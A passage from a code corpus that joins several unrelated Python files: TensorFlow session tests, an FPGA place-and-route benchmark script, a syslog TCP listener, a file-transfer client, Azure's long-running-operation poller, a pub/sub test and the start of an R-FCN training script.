with session.Session(server.target, config=config_pb) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
@test_util.run_v1_only('b/120545219')
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config_pb)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
@test_util.run_v1_only('b/120545219')
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
@test_util.run_v1_only('b/120545219')
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
@test_util.run_v1_only('b/120545219')
def testAutoConvertAndCheckData(self):
with self.cached_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegex(
TypeError, r'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
@test_util.run_v1_only('b/120545219')
def testOptimizerOptions(self):
config.set_optimizer_experimental_options({'min_graph_nodes': -1})
with ops.Graph().as_default():
sess = session.Session()
self.assertEqual(
sess._config.graph_options.rewrite_options.min_graph_nodes, -1)
if __name__ == '__main__':
googletest.main()
|
picorv32_benchmark.py
|
#!/usr/bin/env python3
import os, sys, threading
from os import path
import subprocess
import re
num_runs = 8
if not path.exists("picorv32.json"):
subprocess.run(["wget", "https://raw.githubusercontent.com/cliffordwolf/picorv32/master/picorv32.v"], check=True)
subprocess.run(["yosys", "-q", "-p", "synth_ice40 -json picorv32.json -top top", "picorv32.v", "picorv32_top.v"], check=True)
fmax = {}
if not path.exists("picorv32_work"):
os.mkdir("picorv32_work")
threads = []
for i in range(num_runs):
def runner(run):
ascfile = "picorv32_work/picorv32_s{}.asc".format(run)
if path.exists(ascfile):
os.remove(ascfile)
result = subprocess.run(["../nextpnr-ice40", "--hx8k", "--seed", str(run), "--json", "picorv32.json", "--asc", ascfile, "--freq", "40", "--opt-timing"], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if result.returncode != 0:
print("Run {} failed!".format(run))
else:
icetime_res = subprocess.check_output(["icetime", "-d", "hx8k", ascfile])
fmax_m = re.search(r'\(([0-9.]+) MHz\)', icetime_res.decode('utf-8'))
fmax[run] = float(fmax_m.group(1))
threads.append(threading.Thread(target=runner, args=[i+1]))
for t in threads: t.start()
for t in threads: t.join()
fmax_min = min(fmax.values())
fmax_max = max(fmax.values())
fmax_avg = sum(fmax.values()) / len(fmax)
print("{}/{} runs passed".format(len(fmax), num_runs))
print("icetime: min = {} MHz, avg = {} MHz, max = {} MHz".format(fmax_min, fmax_avg, fmax_max))
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
Syslog TCP listener for napalm-logs.
'''
from __future__ import absolute_import
from __future__ import unicode_literals
# Import pythond stdlib
import re
import time
import random
import socket
import logging
import threading
try:
import Queue as queue
except ImportError:
import queue
# Import third party libs
# Import napalm-logs pkgs
from napalm_logs.config import TIMEOUT
from napalm_logs.config import BUFFER_SIZE
from napalm_logs.config import REUSE_PORT
from napalm_logs.config import MAX_TCP_CLIENTS
from napalm_logs.listener.base import ListenerBase
# exceptions
from napalm_logs.exceptions import BindException
from napalm_logs.exceptions import ListenerException
log = logging.getLogger(__name__)
OCTET_FRAMING_RGX = r'\d+\s(<\d+>)'
class TCPListener(ListenerBase):
'''
TCP syslog listener class
'''
def __init__(self, address, port, **kwargs):
if kwargs.get('address'):
self.address = kwargs['address']
else:
self.address = address
if kwargs.get('port'):
self.port = kwargs['port']
else:
self.port = port
self.buffer_size = kwargs.get('buffer_size', BUFFER_SIZE)
self.reuse_port = kwargs.get('reuse_port', REUSE_PORT)
self.socket_timeout = kwargs.get('socket_timeout', TIMEOUT)
self.max_clients = kwargs.get('max_clients', MAX_TCP_CLIENTS)
self.framing = kwargs.get('framing', 'traditional')
self.frame_delimiter = kwargs.get('frame_delimiter', '\n')
self.buffer = queue.Queue()
def _client_connection(self, conn, addr):
'''
Handle the connecition with one client.
'''
log.debug('Established connection with %s:%d', addr[0], addr[1])
conn.settimeout(self.socket_timeout)
try:
prev_msg = ''
while self.__up:
msg = conn.recv(self.buffer_size)
if not msg:
# log.debug('Received empty message from %s', addr)
# disabled ^ as it was too noisy
continue
log.debug('[%s] Received %s from %s', time.time(), msg, addr)
messages = []
if isinstance(msg, bytes):
msg = msg.decode('utf-8')
if self.framing == 'traditional':
msg = prev_msg + msg
msg_lines = msg.split(self.frame_delimiter)
if len(msg_lines) > 1:
for line in msg_lines[:-1]:
messages.append(line)
prev_msg = msg_lines[-1]
else:
messages = [msg]
elif self.framing == 'octet-counted':
msg_chunks = re.split(OCTET_FRAMING_RGX, msg)
messages = [
'{}{}'.format(pri, body).strip()
for pri, body in zip(msg_chunks[1::2], msg_chunks[2::2])
]
for message in messages:
log.debug('[%s] Queueing %s', time.time(), message)
self.buffer.put((message, '{}:{}'.format(addr[0], addr[1])))
except socket.timeout:
if not self.__up:
return
log.info('Connection %s:%d timed out', addr[0], addr[1])
finally:
log.debug('Closing connection with %s', addr)
conn.close()
def _serve_clients(self):
'''
Accept cients and serve, one separate thread per client.
'''
self.__up = True
while self.__up:
log.debug('Waiting for a client to connect')
try:
conn, addr = self.skt.accept()
log.debug('Received connection from %s:%d', addr[0], addr[1])
except socket.error as error:
if not self.__up:
return
msg = 'Received listener socket error: {}'.format(error)
log.error(msg, exc_info=True)
raise ListenerException(msg)
client_thread = threading.Thread(target=self._client_connection, args=(conn, addr,))
client_thread.start()
def start(self):
'''
Start listening for messages.
'''
log.debug('Creating the TCP server')
if ':' in self.address:
self.skt = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
self.skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.reuse_port:
self.skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, 'SO_REUSEPORT'):
self.skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
else:
log.error('SO_REUSEPORT not supported')
try:
self.skt.bind((self.address, int(self.port)))
except socket.error as msg:
error_string = 'Unable to bind to port {} on {}: {}'.format(self.port, self.address, msg)
log.error(error_string, exc_info=True)
raise BindException(error_string)
log.debug('Accepting max %d parallel connections', self.max_clients)
self.skt.listen(self.max_clients)
self.thread_serve = threading.Thread(target=self._serve_clients)
self.thread_serve.start()
def receive(self):
'''
Return one message dequeued from the listen buffer.
'''
while self.buffer.empty() and self.__up:
# This sequence is skipped when the buffer is not empty.
sleep_ms = random.randint(0, 1000)
# log.debug('The message queue is empty, waiting %d miliseconds', sleep_ms)
# disabled ^ as it was too noisy
time.sleep(sleep_ms / 1000.0)
if not self.buffer.empty():
return self.buffer.get(block=False)
return '', ''
def stop(self):
'''
Closing the socket.
'''
log.info('Stopping the TCP listener')
self.__up = False
try:
self.skt.shutdown(socket.SHUT_RDWR)
except socket.error:
log.error('The following error may not be critical:', exc_info=True)
self.skt.close()
|
client.py
|
#!/usr/bin/env python3
import getpass
import json
import os
import select
import sys
import time
from multiprocessing import Process, shared_memory, Lock
from threading import Thread
import nest_asyncio
from securedrop import utils
from securedrop.List_Contacts_Packets import ListContactsPackets
from securedrop.List_Contacts_Response_Packets import ListContactsResponsePackets
from securedrop.add_contact_packets import AddContactPackets
from securedrop.client_server_base import ClientBase
from securedrop.file_transfer_packets import FileTransferRequestPackets, FileTransferRequestResponsePackets, \
FileTransferCheckRequestsPackets, FileTransferAcceptRequestPackets, FileTransferSendTokenPackets, \
FileTransferSendPortPackets, FileTransferSendPortTokenPackets, FILE_TRANSFER_P2P_CHUNK_SIZE
from securedrop.login_packets import LoginPackets
from securedrop.p2p import P2PClient, P2PServer
from securedrop.register_packets import RegisterPackets
from securedrop.status_packets import StatusPackets
from securedrop.utils import sha256_file, sizeof_fmt
from securedrop.utils import validate_and_normalize_email
DEFALT_SERVER_CERT_PATH = 'server.pem'
DEFAULT_FILENAME = 'client.json'
LIST_CONTACTS_TEST_FILENAME = 'list_contacts_test.json'
DEFAULT_HOSTNAME = '127.0.0.1'
DEFAULT_PORT = 6969
DEBUG_DEFAULT = False
DEBUG = False
class RegisteredUsers:
def __init__(self, filename):
self.filename = filename
self.users = set()
if os.path.exists(self.filename):
with open(self.filename, 'r') as f:
self.users = set(json.load(f))
def make_json(self):
return list(self.users)
def write_json(self):
with open(self.filename, 'w') as f:
json.dump(self.make_json(), f)
def register_prompt(self):
name = input("Enter Full Name: ")
email = input("Enter Email Address: ")
valid_email = validate_and_normalize_email(email)
if valid_email is None:
raise RuntimeError("Invalid Email Address.")
if valid_email in self.users:
raise RuntimeError("That email already exists!")
pw1 = getpass.getpass(prompt="Enter Password: ")
pw2 = getpass.getpass(prompt="Re-enter password: ")
if pw1 != pw2:
raise RuntimeError("The two entered passwords don't match!")
# enforce password length to min of 12 characters
if len(pw1) < 12:
raise RuntimeError("Password is too short! Password must be at least 12 characters")
if not name or not valid_email or not pw1:
raise RuntimeError("Empty input")
return name, valid_email, pw1
def register_user(self, email):
self.users.add(email)
self.write_json()
print("User registered.")
def login_prompt(self):
email = input("Enter Email Address: ")
password = getpass.getpass(prompt="Enter Password: ")
return email, password
class Client(ClientBase):
users: RegisteredUsers
def __init__(self, host: str, prt: int, filename):
super().__init__(host, prt)
self.filename = filename
try:
self.users = RegisteredUsers(filename)
self.user = None
except Exception as e:
print("Exiting SecureDrop")
raise e
async def main(self, server_cert_path=DEFALT_SERVER_CERT_PATH):
try:
await super().main()
if not self.users.users:
decision = input(
"No users are registered with this client.\nDo you want to register a new user (y/n)? ")
if str(decision) == 'y':
self.user = await self.register()
if self.user:
await self.sh()
else:
raise RuntimeError("Registration failed.")
else:
raise RuntimeError("You must register a user before using securedrop")
else:
self.user = await self.login()
if self.user:
await self.sh()
else:
raise RuntimeError("Login failed.")
except KeyboardInterrupt:
pass
finally:
print("Exiting SecureDrop")
async def register(self):
msg, email = None, None
try:
name, email, pw = self.users.register_prompt()
await self.write(bytes(RegisterPackets(name, email, pw)))
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
self.users.register_user(email)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to register: ", msg)
return None
return email
async def login(self):
msg, email = None, None
try:
email, pw = self.users.login_prompt()
await self.write(bytes(LoginPackets(email, pw)))
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to login: ", msg)
return None
return email
async def sh(self):
try:
print("Welcome to SecureDrop")
print("Type \"help\" For Commands")
prompt = True
while True:
if prompt:
print("secure_drop> ", end="", flush=True)
prompt = False
if select.select([sys.stdin], [], [], 1)[0]:
cmd = input().strip()
if cmd == "help":
print("\"add\" \t-> Add a new contact")
print("\"list\" \t-> List all online contacts")
print("\"send\" \t-> Transfer file to contact")
print("\"exit\" \t-> Exit SecureDrop")
elif cmd == "add":
await self.add_contact()
elif cmd == "list":
await self.list_contacts()
elif cmd == "send":
await self.send_file()
elif cmd == "exit":
break
else:
print("Unknown command: {}".format(cmd))
prompt = True
if (await self.check_for_file_transfer_requests()) is not None:
prompt = True
except Exception or KeyboardInterrupt as e:
print("Exiting SecureDrop")
raise e
async def add_contact(self):
msg = None
try:
name = input("Enter Full Name: ")
email = input("Enter Email Address: ")
valid_email = validate_and_normalize_email(email)
if valid_email is None:
raise RuntimeError("Invalid Email Address.")
if not name:
raise RuntimeError("Empty name input.")
await self.write(bytes(AddContactPackets(name, valid_email)))
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to add contact: ", msg)
async def list_contacts(self):
msg = ""
try:
await self.write(bytes(ListContactsPackets()))
contact_dict = ListContactsResponsePackets(data=(await self.read())[4:]).contacts
# print contacts by Email and Name
if len(contact_dict) > 0:
print("Email:\t\t\t\tName:")
for email, name in contact_dict.items():
print(email + "\t\t\t" + name)
else:
print("No contacts online!")
if DEBUG:
try:
with open(LIST_CONTACTS_TEST_FILENAME, 'w') as f:
json.dump(contact_dict, f)
except RuntimeError as e:
msg = str(e)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to list contacts: ", msg)
# Y
async def check_for_file_transfer_requests(self):
# 2. `Y -> S`: every one second, Y asks server for any requests
await self.write(bytes(FileTransferRequestResponsePackets()))
# 3. `S -> X/F -> Y`: server responds with active requests
file_transfer_requests = FileTransferCheckRequestsPackets(data=(await self.read())[4:]).requests
if not file_transfer_requests:
return
print("Incoming file transfer request(s):")
index_to_email = dict()
index_to_file_info = dict()
i = 1
for email, file_info in file_transfer_requests.items():
print("\t{}. {}".format(i, email))
print("\t\tname: ", file_info["name"])
print("\t\tsize: ", sizeof_fmt(int(file_info["size"])))
print("\t\tSHA256: ", file_info["SHA256"])
index_to_email[i] = email
index_to_file_info[i] = file_info
i += 1
try:
selection = input("\nEnter the number for which request you'd like to accept, or 0 to deny all: ")
accept = True
selection_num = int(selection)
if selection_num <= 0 or selection_num >= i:
raise ValueError
packets = FileTransferAcceptRequestPackets(index_to_email[selection_num])
except ValueError or KeyboardInterrupt:
packets = FileTransferAcceptRequestPackets("")
accept = False
if accept:
while True:
out_directory = input("Enter the output directory: ")
file_path = os.path.join(out_directory, index_to_file_info[selection_num]["name"])
if not os.path.isdir(out_directory):
print("The path {} is not a directory".format(os.path.abspath(out_directory)))
elif os.path.exists(file_path):
print("The file {} already exists".format(file_path))
elif not os.access(out_directory, os.X_OK | os.W_OK):
print("Cannot write file path {} permission denied.".format(file_path))
else:
break
# 4. `Y -> Yes/No -> S`: Y accepts or denies transfer request
await self.write(bytes(packets))
if not accept:
return False
# 5. `S -> Token -> Y`: if Y accepted, server sends a unique token Y
token = FileTransferSendTokenPackets(data=(await self.read())[4:]).token
lock = Lock()
progress = shared_memory.SharedMemory(create=True, size=8)
server_sentinel = shared_memory.SharedMemory(create=True, size=1)
status_sentinel = shared_memory.SharedMemory(create=True, size=1)
listen_port = shared_memory.SharedMemory(create=True, size=4)
# 6. `Y -> Port -> S`: Y binds to 0 (OS chooses) and sends the port it's listening on to S
p2p_server = P2PServer(token, os.path.abspath(out_directory), progress.name, lock, listen_port.name,
status_sentinel.name)
p2p_server_process = Process(target=p2p_server.run, args=(0, server_sentinel.name))
p2p_server_process.start()
print("Started P2P server. Waiting for listen...")
# wait for listen
port = 0
while port == 0:
with lock:
port = int.from_bytes(listen_port.buf, byteorder='little')
await self.write(bytes(FileTransferSendPortPackets(port)))
# Wait until file received
time_start = time.time()
chunk_size = FILE_TRANSFER_P2P_CHUNK_SIZE
def unguarded_print_received_progress(final=False):
utils.print_status(
*utils.get_progress(int.from_bytes(progress.buf[0:4], byteorder='little'),
int.from_bytes(progress.buf[4:8], byteorder='little'), chunk_size), "received",
final)
def print_received_progress():
while True:
with lock:
if status_sentinel.buf[0] == 1:
break
unguarded_print_received_progress()
time.sleep(0.03)
status_thread = Thread(target=print_received_progress)
status_thread.start()
try:
p2p_server_process.join()
except KeyboardInterrupt:
raise RuntimeError("User requested abort")
finally:
if p2p_server_process.is_alive():
p2p_server_process.terminate()
with lock:
status_sentinel.buf[0] = 1
status_thread.join()
unguarded_print_received_progress(final=True)
progress.close()
progress.unlink()
server_sentinel.close()
server_sentinel.unlink()
status_sentinel.close()
status_sentinel.unlink()
listen_port.close()
listen_port.unlink()
time_end = time.time()
print("File transfer completed successfully in {} seconds.".format(time_end - time_start))
return True
# X
async def send_file(self):
msg = None
try:
# 1. `X -> Y/F -> S`: X wants to send F to Y
recipient_email = input("Enter the recipient's email address: ")
file_path = os.path.abspath(input("Enter the file path: "))
valid_email = validate_and_normalize_email(recipient_email)
if valid_email is None:
raise RuntimeError("Invalid Email Address.")
if not file_path:
raise RuntimeError("Empty file path.")
if not os.path.exists(file_path):
raise RuntimeError("Cannot find file: {}".format(file_path))
if not os.path.isfile(file_path):
raise RuntimeError("Not a file: {}".format(file_path))
file_base = os.path.basename(file_path)
file_size = os.path.getsize(file_path)
file_sha256 = sha256_file(file_path)
file_info = {
"name": file_base,
"size": file_size,
"SHA256": file_sha256,
}
# send request
await self.write(bytes(FileTransferRequestPackets(valid_email, file_info)))
# this only checks if the request is valid
# this does not check if the recipient accepted or denied the request
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
# 7. `S -> Token/Port -> X`: S sends the same token and port to X
# denied request is indicated by empty token and port
port_and_token = FileTransferSendPortTokenPackets(data=(await self.read())[4:])
port, token = port_and_token.port, port_and_token.token
if token and port:
print("User {} accepted the file transfer Connecting to recipient on port ".format(valid_email, port))
else:
raise RuntimeError("User {} declined the file transfer request".format(valid_email))
progress = shared_memory.SharedMemory(create=True, size=8)
progress_lock = Lock()
p2p_client = P2PClient(port, token, file_path, file_size, file_sha256, progress.name, progress_lock)
time_start = time.time()
sentinel = False
chunk_size = FILE_TRANSFER_P2P_CHUNK_SIZE
def unguarded_print_sent_progress(final=False):
utils.print_status(
*utils.get_progress(int.from_bytes(progress.buf[0:4], byteorder='little'),
int.from_bytes(progress.buf[4:8], byteorder='little'), chunk_size), "sent",
final)
def print_sent_progress():
while not sentinel:
with progress_lock:
unguarded_print_sent_progress()
time.sleep(0.03)
# i was having trouble with asyncio.gather, so just run status printer in a new thread
status_thread = Thread(target=print_sent_progress)
status_thread.start()
# wait until p2p transfer completes, unless keyboard interrupt
try:
await p2p_client.main()
except KeyboardInterrupt:
raise RuntimeError("User requested abort")
finally:
sentinel = True
status_thread.join()
unguarded_print_sent_progress(final=True)
progress.close()
progress.unlink()
time_end = time.time()
print("\nFile transfer completed in {} seconds.".format(time_end - time_start))
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to send file: ", msg)
def main(hostname=None, port=None, filename=None, debug=None):
nest_asyncio.apply()
hostname = hostname if hostname is not None else DEFAULT_HOSTNAME
port = port if port is not None else DEFAULT_PORT
filename = filename if filename is not None else DEFAULT_FILENAME
global DEBUG
DEBUG = debug if debug is not None else DEBUG_DEFAULT
Client(hostname, port, filename).run()
if __name__ == "__main__":
main()
|
_poller.py
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import threading
import uuid
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from typing import Any, Callable, Union, List, Optional, TypeVar, Generic, TYPE_CHECKING
from azure.core.pipeline.transport._base import HttpResponse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
import requests
from msrest.serialization import Model # pylint: disable=unused-import
DeserializationCallbackType = Union[Model, Callable[[requests.Response], Model]]
PollingReturnType = TypeVar("PollingReturnType")
class PollingMethod(Generic[PollingReturnType]):
"""ABC class for polling method.
"""
def initialize(self, client, initial_response, deserialization_callback):
# type: (Any, Any, Any) -> None
raise NotImplementedError("This method needs to be implemented")
def run(self):
# type: () -> None
raise NotImplementedError("This method needs to be implemented")
def status(self):
# type: () -> str
raise NotImplementedError("This method needs to be implemented")
def finished(self):
# type: () -> bool
raise NotImplementedError("This method needs to be implemented")
def resource(self):
# type: () -> PollingReturnType
raise NotImplementedError("This method needs to be implemented")
class NoPolling(PollingMethod):
"""An empty poller that returns the deserialized initial response.
"""
def __init__(self):
self._initial_response = None
self._deserialization_callback = None
def initialize(self, _, initial_response, deserialization_callback):
# type: (Any, requests.Response, Callable) -> None
self._initial_response = initial_response
self._deserialization_callback = deserialization_callback
def run(self):
# type: () -> None
"""Empty run, no polling.
"""
def status(self):
# type: () -> str
"""Return the current status as a string.
:rtype: str
"""
return "succeeded"
def finished(self):
# type: () -> bool
"""Is this polling finished?
:rtype: bool
"""
return True
def resource(self):
# type: () -> Any
return self._deserialization_callback(self._initial_response)
class LROPoller(Generic[PollingReturnType]):
"""Poller for long running operations.
:param client: A pipeline service client
:type client: ~azure.core.PipelineClient
:param initial_response: The initial call response
:type initial_response:
~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse
:param deserialization_callback: A callback that takes a Response and return a deserialized object.
If a subclass of Model is given, this passes "deserialize" as callback.
:type deserialization_callback: callable or msrest.serialization.Model
:param polling_method: The polling strategy to adopt
:type polling_method: ~azure.core.polling.PollingMethod
"""
def __init__(self, client, initial_response, deserialization_callback, polling_method):
# type: (Any, HttpResponse, DeserializationCallbackType, PollingMethod) -> None
self._client = client
self._response = initial_response
self._callbacks = [] # type: List[Callable]
self._polling_method = polling_method
# This implicit test avoids bringing in an explicit dependency on Model directly
try:
deserialization_callback = deserialization_callback.deserialize # type: ignore
except AttributeError:
pass
# Might raise a CloudError
self._polling_method.initialize(self._client, self._response, deserialization_callback)
# Prepare thread execution
self._thread = None
self._done = None
self._exception = None
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="LROPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
def _start(self):
"""Start the long running operation.
On completion, runs any callbacks.
:param callable update_cmd: The API request to check the status of
the operation.
"""
try:
self._polling_method.run()
except Exception as err: #pylint: disable=broad-except
self._exception = err
finally:
self._done.set()
callbacks, self._callbacks = self._callbacks, []
while callbacks:
for call in callbacks:
call(self._polling_method)
callbacks, self._callbacks = self._callbacks, []
def status(self):
# type: () -> str
"""Returns the current status string.
:returns: The current status string
:rtype: str
"""
return self._polling_method.status()
def result(self, timeout=None):
# type: (Optional[int]) -> PollingReturnType
"""Return the result of the long running operation, or
the result available after the specified timeout.
:returns: The deserialized resource of the long running operation,
if one is available.
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
self.wait(timeout)
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a specified length
of time. You can check if this call as ended with timeout with the
"done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
# https://github.com/python/mypy/issues/8165
raise self._exception # type: ignore
except TypeError: # Was None
pass
def done(self):
# type: () -> bool
"""Check status of the long running operation.
:returns: 'True' if the process has completed, else 'False'.
:rtype: bool
"""
return self._thread is None or not self._thread.is_alive()
def add_done_callback(self, func):
# type: (Callable) -> None
"""Add callback function to be run once the long running operation
has completed - regardless of the status of the operation.
:param callable func: Callback function that takes at least one
argument, a completed LongRunningOperation.
"""
# Still use "_done" and not "done", since CBs are executed inside the thread.
if self._done is None or self._done.is_set():
func(self._polling_method)
# Let's add them still, for consistency (if you wish to access to it for some reasons)
self._callbacks.append(func)
def remove_done_callback(self, func):
# type: (Callable) -> None
"""Remove a callback from the long running operation.
:param callable func: The function to be removed from the callbacks.
:raises ValueError: if the long running operation has already completed.
"""
if self._done is None or self._done.is_set():
raise ValueError("Process is complete.")
self._callbacks = [c for c in self._callbacks if c != func]
|
test_topic.py
|
#!/usr/bin/env python
import QAPUBSUB
import threading
from QAPUBSUB.consumer import subscriber_topic
from QAPUBSUB.producer import publisher_topic
z1 = subscriber_topic(exchange='testTopic', routing_key='#')
z2 = subscriber_topic(exchange='testTopic', routing_key='#.SZ')
z3 = subscriber_topic(exchange='testTopic', routing_key='#.SH')
z1.callback = lambda a, b, c, x: print('FROM X1 {}'.format(x))
z2.callback = lambda a, b, c, x: print('FROM X2 {}'.format(x))
z2.add_sub(exchange='testTopic', routing_key='000001.SZ')
z3.callback = lambda a, b, c, x: print('FROM X3 {}'.format(x))
p = publisher_topic(exchange='testTopic', )
threading.Thread(target=z1.start).start()
threading.Thread(target=z2.start).start()
threading.Thread(target=z3.start).start()
p.pub('000001', routing_key='000001.SZ')
p.pub('000002', routing_key='000002.SZ')
p.pub('601318', routing_key='601318.SH')
"""
在exchange为 xx的mq中
routing_key = x1 ==> 有一个订阅者 z1
routing_key = x2 ==> 有两个订阅者 z2, z3
"""
|
train_rfcn_alt_opt_5stage.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# R-FCN
# Copyright (c) 2016 Yuwen Xiong, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
"""Train a R-FCN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("R-FCN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals, imdb_rpn_compute_stats
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a R-FCN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ResNet-101")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--imdb_test', dest='imdb_test_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--model', dest='model_name',
help='folder name of model',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(imdb_name, net_name, model_name):
# R-FCN Alternating Optimization
# Solver for each training stage
if imdb_name.startswith('coco'):
